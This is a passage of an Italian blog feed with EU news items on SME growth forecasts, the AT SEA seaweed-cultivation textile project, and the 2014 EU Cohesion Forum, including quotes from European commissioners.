10% rispetto alla ricchezza generata nel 2008.</p> <p><strong>Quali sono gli obiettivi per il biennio 2014-2015?</strong> Per il 2014 si prevede per le PMI un aumento del 2,8% e per il 2015 del 3,4%. Nel settore occupazionale invece è previsto un aumento dello 0,1% per il 2014 e dello 0,7% per il 2015. Queste percentuali corrispondono ad una crescita dell'occupazione di 740.000 posti di lavoro nelle PMI, cifre comunque insufficiente a risanare le perdite registrate dal 2008. Nel 2013 le 21,6 milioni di PMI degli Stati UE hanno offerto posti di lavoro ad 88.8 milioni di persone ottenendo un guadagno di 3.666 miliardi di euro.</p> <span class="csfoo htmla"></span><dl class='spip_document_1229 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Ferdinando_Nelli_feroci.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH100/Ferdinando_Ne69e-13978.jpg' width='150' height='100' alt='JPEG - 8.9 Kb' style='height:100px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole del Commissario europeo responsabile per l'industria e l'imprenditoria, Ferdinando Nelli Feroci: "<i>Le difficoltà che le PMI continuano ad incontrare sottolineano la necessità che l'UE e gli Stati membri continuino gli sforzi per migliorare il clima imprenditoriale. Abbiamo bisogno di PMI per creare posti di lavoro e gli indicatori pubblicati oggi evidenziano che occorre fare di più per affrontare ostacoli come la difficoltà di accesso ai finanziamenti, se vogliamo raggiungere una crescita sostenuta delle PMI in tutta l'UE</i>".</p></div> Parte il progetto AT SEA http://torvergata.eurosblog.eu/spip.php?article1001 http://torvergata.eurosblog.eu/spip.php?article1001 2014-10-08T20:04:30Z text/html it Vanessa Piacenti <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1001.jpg" alt="" width="311" height="162" class="spip_logos" /></a>Forse pochi lo sanno, ma le alghe possono essere una ricchezza fondamentale per la produzione di alimenti ed ingredienti per mangimi, per prodotti biochimici e biocarburanti. La difficoltà maggiore però è quella di poterle raccogliere con un buon sistema e in proporzioni notevoli. L'Ue ha allora finanziato il progetto AT SEA che ha potenziato tessuti nuovi che incrementano la produttività dell'alghicoltura galleggiante permettendo così di coltivare in maniera più facile e meccanica. Il (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique2" rel="directory">Attualità europea</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH79/arton1001-68840.jpg" alt="" align="right" width='150' height='79' class='spip_logos' style='height:79px;width:150px;' /> <div class='rss_chapo'><p>Forse pochi lo sanno, ma le alghe possono essere una ricchezza fondamentale per la produzione di alimenti ed ingredienti per mangimi, per prodotti biochimici e biocarburanti. La difficoltà maggiore però è quella di poterle raccogliere con un buon sistema e in proporzioni notevoli. L'Ue ha allora finanziato il progetto AT SEA che ha potenziato tessuti nuovi che incrementano la produttività dell'alghicoltura galleggiante permettendo così di coltivare in maniera più facile e meccanica.</p></div> <div class='rss_texte'><p>Il coordinatore del progetto AT SEA Bert Groenendaal, è convinto del fatto che coltivare le alghe marine su larga scala possa permettere di far nascere in Europa un nuovo settore che dia occupazione a molte persone e che generi da solo miliardi di euro. Oltre alle sette imprese partecipano al progetto anche quattro centri di ricerca.</p> <p>Ma come vengono raccolte le alghe? Al momento vengono raccolte alghe selvatiche o a coltivazione su corde, ma questi metodi sono difficilmente riproducibili su larga misura in quanto serve molta manodopera e il rendimento è molto basso. Il team che fa parte del progetto ha allora avuto un'idea innovativa : creare un tessuto sul quale si possano coltivare alghe in grandi quantità senza che il tessuto stesso rischi però di disintegrarsi o di attrarre piante sgradite o molluschi. Il tessuto studiato è rivestito da una pellicola di origine biologica che fa da barriera alle alghe e ne incrementa la crescita. Questi tessuti formano ampie stuoie che hanno lo spessore di 1 mm che vengono poste sotto la superficie del mare per ospitare le alghe. quando le alghe avranno raggiunto il loro stato di maturità, si passa alla fase di raccolta sulle navi attraverso delle macchine per essere poi depositate in serbatoi di stoccaggio flessibili.</p> <span class="csfoo htmla"></span><dl class='spip_document_1226 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Alghe.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH142/Alghe-0ed47jc94d-f0edf.jpg' width='150' height='142' alt='JPEG - 10.9 Kb' style='height:142px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>A partire da questo mese, AT SEA comincerà a coltivare 200 metri quadri di stuoie in ognuno dei 3 siti sperimentali, per determinarne il valore commerciale. Secondo Groenendaal, la produttività potrebbe far arrivare le alghe a 20-25 kg per metro quadrato man mano che il consorzio migliorerà le tecniche che vengono al momento utilizzate. Il consorzio ha poi fatto richiesta di un brevetto per i tessuti di cui si è precedentemente parlato e alla fine del progetto prevista per il 2015, c'è la volontà di promuovere un sito di coltura su una scala di 2 o 3 ettari per mezzo di un'impresa commerciale che sarà il trampolino di lancio per l'AT SEA. Inoltre bisogna sottolineare che vi è grande interesse per questi tessuti utilizzabili anche per fini commerciali come l'acquacoltura o la produzione di contenitori per il trasporto via mare di acqua dolce.</p> <p>Ma a livello effettivo le alghe che usi possono avere? Gli usi possono essere molteplici e in vari settori come il loro utilizzo per sostanze biochimiche per farmaci, cosmetici naturali e fertilizzanti organici. Altre possono essere utilizzate per biocombustibili ma ovviamente la loro raccolta deve essere consistente per poterle sfruttare su scala industriale. Inoltre è interessato anche il settore alimentare, infatti le alghe vengono mangiate così come sono dalle popolazioni di molti paesi asiatici, mentre in Europa molti prodotti alimentari vengono modificati come per esempio il latte al cioccolato, lo yogurt, le bevande salutistiche e le birre ma essi contengono tutti derivati della alghe marine come l'agar, i carragenani e gli alginati, che sono utilizzati come leganti o emulsionanti. Un fattore ancor più importante è che le alghe sono essenziali anche per l'effetto positivo che hanno sul nostro ecosistema:sono in grado di assorbire sia l'anidride carbonica in eccesso nell'acqua del mare sia i nutrienti residui che vengono liberati dalle aziende che praticano l'allevamento ittico. Sono anche un habitat sicuro per tutti quei pesci e quei molluschi selvatici che diversamente potrebbero essere minacciati dalla pesca.</p> <span class="csfoo htmla"></span><dl class='spip_document_1227 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Maire_Geoghegan-Quinn_2.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH100/Maire_Geoghe8201-d7d60.jpg' width='150' height='100' alt='JPEG - 8.8 Kb' style='height:100px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole della Commissaria europea per la Ricerca, l'innovazione e la scienza Máire Geoghegan-Quinn,: "AT SEA è solo uno degli esempi di come i finanziamenti UE sostengono l'innovazione stimolando la collaborazione tra ricercatori e imprese. Questo progetto di ricerca permetterà alle imprese dell'UE di coltivare una preziosa risorsa in modo efficiente, aiutandole a competere sui mercati mondiali. Orizzonte 2020, il nuovo programma di ricerca dell'UE che può contare su finanziamenti per 80 miliardi di euro, sostiene le imprese e le industrie che vogliono trasferire nuove idee dai laboratori al mercato con rapidità e in modo economicamente efficiente".</p></div> Sesto Forum sulla coesione http://torvergata.eurosblog.eu/spip.php?article1000 http://torvergata.eurosblog.eu/spip.php?article1000 2014-10-02T13:07:38Z text/html it Vanessa Piacenti <a href="http://torvergata.eurosblog.eu/liens_absolus"><img src="http://torvergata.eurosblog.eu/IMG/arton1000.jpg" alt="" width="290" height="174" class="spip_logos" /></a>Lo scorso 8 e 9 settembre si è tenuto a Bruxelles il sesto forum sulla coesione per mettere in rilievo l'importanza di creare nuovi impieghi sia nelle regioni che nelle città europee e per accentuarne la crescita. Tutto questo per ridurre al minimo la discrepanza economica e sociale che si è venuta a creare nel corso del tempo tra le regioni europee, per incrementare la loro competizione e per raggiungere gli obiettivi a cui l'Europa vuole arrivare entro il 2020. Il forum sulla coesione viene (...) - <a href="http://torvergata.eurosblog.eu/spip.php?rubrique2" rel="directory">Attualità europea</a> <img src="http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH90/arton1000-fa5a8.jpg" alt="" align="right" width='150' height='90' class='spip_logos' style='height:90px;width:150px;' /> <div class='rss_chapo'><p>Lo scorso 8 e 9 settembre si è tenuto a Bruxelles il sesto forum sulla coesione per mettere in rilievo l'importanza di creare nuovi impieghi sia nelle regioni che nelle città europee e per accentuarne la crescita. Tutto questo per ridurre al minimo la discrepanza economica e sociale che si è venuta a creare nel corso del tempo tra le regioni europee, per incrementare la loro competizione e per raggiungere gli obiettivi a cui l'Europa vuole arrivare entro il 2020.</p></div> <div class='rss_texte'><p>Il forum sulla coesione viene organizzato ogni tre anni e riunisce leader e politici di spicco che appartengono agli Stati membri dell'Ue al fine di valutare se gli obiettivi che ci si è prefissati di raggiungere siano stati effettivamente portati a termine. Il tema affrontato per il 2014 ha riguardato gli investimenti per la crescita e l'occupazione, con particolare attenzione alla promozione dello sviluppo e del buon governo nelle regioni e città dell'UE.</p> <span class="csfoo htmla"></span><dl class='spip_document_1224 spip_documents spip_documents_right' style='float:right;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Bruxelles.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH113/Bruxelles-f0d0bf-a3392.jpg' width='150' height='113' alt='JPEG - 9.7 Kb' style='height:113px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Ma quali sono i settori maggiormente interessati da questa politica di coesione? Innanzitutto va sottolineato che per raggiungere questi obiettivi, l'Europa dispone di un bilancio complessivo di 352 miliardi di euro per il periodo che va dal 2014 al 2020. I settori interessati sono: il contesto dell'innovazione, l'appoggio alle piccole e medie imprese, il miglioramento delle qualifiche, l'inclusione sociale e l'energia. Tutti questi ambiti sono determinanti per una buona crescita sul lungo periodo.</p> <p>La due giorni di forum ha preso in esame anche un'altra questione di fondamentale importanza: la necessità di implementare efficienza e trasparenza da parte delle amministrazioni e l'efficacia delle politiche macroeconomiche. A luglio del 2014 è stata pubblicata la sesta relazione sulla coesione, dalla quale si evince che gli Stati membri hanno come obiettivo quello di innalzare del 70% gli investimenti destinati ad ottimizzare la competenza istituzionale da parte delle autorità pubbliche.</p> <p>Attraverso gli accordi di partenariato è stato possibile desumere che ci sono degli elementi che fanno ben sperare in materia di investimenti per l'Ue per la politica di coesione. Essi riguardano ambiti come il sostegno all'innovazione e alle piccole imprese e un incremento dei mezzi finanziari. Oltre 38 miliardi di euro sono previsti per settori come l'efficienza energetica e le energie rinnovabili, questa cifra equivale a più del doppio di quella spesa per l'economia a basse emissioni di carbonio tra il 2007 e il 2013.</p> <span class="csfoo htmla"></span><dl class='spip_document_1225 spip_documents spip_documents_left' style='float:left;width:150px;'> <dt><a href="http://torvergata.eurosblog.eu/IMG/jpg/Johannes_Hahn.jpg" title='' type="image/jpeg"><img src='http://torvergata.eurosblog.eu/local/cache-vignettes/L150xH100/Johannes_Hah4f25-0bb81.jpg' width='150' height='100' alt='JPEG - 5.1 Kb' style='height:100px;width:150px;' /></a></dt> </dl><span class="csfoo htmlb"></span> <p>Nelle parole del Commissario per la politica regionale, Johannes Hahn: "La politica di coesione costituisce la principale politica degli investimenti dell'UE. In questo senso il suo obiettivo originario, che è il sostegno alle regioni europee più povere, è cresciuto, senza essere in alcun modo tradito. Le nostre riforme, che si riflettono negli accordi di partenariato e nei programmi operativi, consentono a questa politica di investire nell'economia reale europea e di perseguire i più vasti obiettivi dell'UE, ossia occupazione, sicurezza energetica, ambiente più pulito e crescita duratura. È incoraggiante quanto emerge dai piani degli Stati membri dell'UE: nel periodo 2014-2020 gli investimenti saranno maggiormente orientati a stimolare l'innovazione, sostenere le PMI, creare posti di lavoro e promuovere la crescita verde e la competitività delle nostre regioni. Possiamo e abbiamo il dovere di rispondere alle sfide che si pongono ai nostri paesi e ai nostri cittadini, in particolare in questi tempi di difficoltà economiche. Il Forum sulla coesione rappresenta sotto questo aspetto un'occasione ideale per uno scambio di idee su priorità e bisogni futuri tra rappresentanti nazionali, regionali e locali e altre parti interessate".</p></div>